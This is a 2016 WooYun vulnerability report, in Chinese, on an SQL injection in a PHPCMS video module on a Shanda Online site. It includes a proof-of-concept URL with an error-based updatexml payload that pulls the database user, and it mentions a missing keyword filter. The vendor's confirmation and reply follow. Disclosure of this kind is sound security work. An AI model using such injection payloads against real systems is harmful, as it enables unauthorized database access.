当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2016-177346

漏洞标题: 盛大在线某站存在SQL注射漏洞(第三方应用)

相关厂商: 盛大在线

漏洞作者: 路人甲

提交时间: 2016-02-21 09:20

公开时间: 2016-03-07 01:11

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 15

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-21: 细节已通知厂商并且等待厂商处理中
2016-02-22: 厂商已经确认,细节仅向厂商公开
2016-03-03: 细节向核心白帽子及相关领域专家公开
2016-03-13: 细节向普通白帽子公开
2016-03-23: 细节向实习白帽子公开
2016-03-07: 细节向公众公开

简要描述:

rt

详细说明:

证明下 WooYun: PHPCMS某处注入(版本/条件限制) 这个洞的价值



使用phpcms拥有视频功能一般都会中招



code 区域
http://video.sdo.com/index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=11&title=12&description=%E9%8C%A6&keywords=,updatexml(1,concat(0x3a,(select%20user())),1),1,1,1,1)%23





这个是老版本的吧 竟然没有

code 区域
str_replace(array('select','from','concat'),'',$data['keywords'])

的过滤



1.png





QQ图片20160220202532.png

漏洞证明:

1.png





QQ图片20160220202532.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-02-22 09:57

厂商回复:

谢谢报告,这个域名估计会被停掉!!

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2016-02-22 12:03 | 盛大网络(乌云厂商)
    1

    洞主用0day打我们!!

登录后才能发表评论,请先 登录